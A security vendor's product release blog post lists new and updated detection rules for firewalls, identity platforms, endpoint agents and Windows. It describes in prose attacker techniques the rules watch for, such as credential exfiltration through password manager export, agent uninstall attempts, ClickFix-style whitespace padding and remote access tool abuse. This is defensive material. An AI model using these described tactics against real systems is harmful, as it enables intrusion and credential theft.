Search
Get A Demo
Get Started
    Get A Demo
    Get Started
      January 12, 2026

      December 2025 Product Releases

      This month’s release expands Blumira’s detection coverage across Microsoft 365, Fortigate, JumpCloud, SentinelOne, Check Point, and Windows environments. New detections highlight suspicious authentication behavior, unauthorized admin activity, and endpoint tampering attempts, such as logins from new countries, password manager exports, and agent uninstall requests. Detection logic for Splashtop and NetSupport Manager has been refined with new indicators and elevated priorities. Platform enhancements include an audit to improve MITRE ATT&CK® tagging accuracy and a bug fix in a Blumira 7-Day Summary report.

      Detection Updates

      Log Type Details
      Check Point Audit NEW - Check Point: User Object Change

      Monitors for the creation, deletion, or modification of user objects in Check Point firewalls

      Default state: Enabled
      Fortigate Event
      		 NEW - Fortigate: Local Admin Created

      Detects the creation of new local administrator accounts on Fortigate devices

      Default state: Enabled
      Fortigate Event NEW - Fortigate: Local Admin Edited

      Monitors for local administrator accounts being renamed or modified on Fortigate devices

      Default state: Disabled
      Fortigate Event
      		 NEW - Fortigate: Local Admin Deleted

      Monitors for the deletion of local administrator accounts on Fortigate devices

      Default state: Disabled
      Fortigate Event
      		 NEW - Fortigate: Local User Created

      Detects the creation of new local user accounts on Fortigate devices

      Default state: Enabled
      Fortigate Event
      		 NEW - Fortigate: Local User Edited

      Monitors for local user accounts being renamed or modified on Fortigate devices

      Default state: Disabled
      Fortigate Event
      		 NEW - Fortigate: Local User Deleted

      Monitors for the deletion of local user accounts Fortigate devices

      Default state: Disabled
      Fortigate Virus
      		 NEW - Fortigate: Unblocked Infected File

      Triggers when Fortigate’s antivirus engine identifies a malicious file, but the associated traffic is not blocked

      Default state: Enabled
      JumpCloud Directory
      		 NEW - JumpCloud: Admin Login Without MFA

      Monitors for successful JumpCloud administrator login without multi-factor authentication

      Default state: Enabled
      JumpCloud Password Manager
      		 NEW - JumpCloud: Potential Password Manager Export

      Triggers when JumpCloud detects export activity from a password manager, which is a tactic often used by attackers to exfiltrate credentials during an account compromise

      Default state: Enabled
      Microsoft 365 and Azure
      		 NEW - Microsoft 365: User Authentication from New Country

      Identifies login events originating from a country the user has not logged in from within the prior 15 days

      Default state: Enabled
      SentinelOne Activities
      		 NEW - SentinelOne: Agent Uninstall Request

      Monitors for requests to uninstall the SentinelOne agent, which may indicate early-stage attempts by an attacker to remove the agent from a protected endpoint

      Default state: Enabled
      Windows NEW - Suspicious Explorer Process with Whitespace Padding

      Identifies processes in Windows Explorer containing 12 or more consecutive Unicode whitespace characters in the command line arguments, which is commonly seen in ClickFix and FileFix social engineering attacks

      Default state: Enabled
      Fortigate
      		 UPDATE - Fortigate: Successful Admin Login from External IP Address

      Corrected a typo in the detection’s analysis
      Windows UPDATE - Remote Access Tool: Splashtop

      Updated to include additional known process names
      Windows
      		 UPDATE - Remote Access Tool: NetSupport Manager

      Updated logic for broader coverage, elevated priority to P2 Suspect, and changed the default deploy state to enabled
      Windows UPDATE - Remote Access Tool: NetSupport Manager From Unusual Location

      - Increased priority to P1 Suspect and changed the default deploy state to enabled
      - Findings for this rule now include the hash field for added context

      Bug Fixes and Improvements

      Bug Fixes 

      • Blumira 7-Day Summary: Grouped Log Counts by Type: The global report now correctly includes all log types and will dynamically update with newly added sources as integrations are introduced over time. Previously, it was static and limited to a manually defined set of log sources, which led to the report missing some log types.

      Improvements 

      • MITRE ATT&CK® Tagging: We conducted a full audit and refinement of the MITRE ATT&CK® techniques we have tagged across our existing detection rules to improve accuracy of those tags.

      November 2025 Release Notes

      In case you missed the November updates, you can find and review those notes here.

      Tag(s): Product Updates , Blog , Product Release Notes , Detection Update

      Eric Pitt

      Eric is a Product Marketing Manager at Blumira focusing on customer research and positioning to continuously improve the Blumira platform.

      More from the blog

      View All Posts
      Product Updates
      9 min read | January 12, 2026

      December 2025 Product Releases

      Read More
      2025 Fall Cyber Solutions Fest
      Product Updates
      2 min read | December 16, 2025

      Blumira at 2025 Fall Cyber Solutions Fest: Revolutionizing Security Ops!

      Read More
      Product Updates
      10 min read | December 9, 2025

      November 2025 Product Releases

      Read More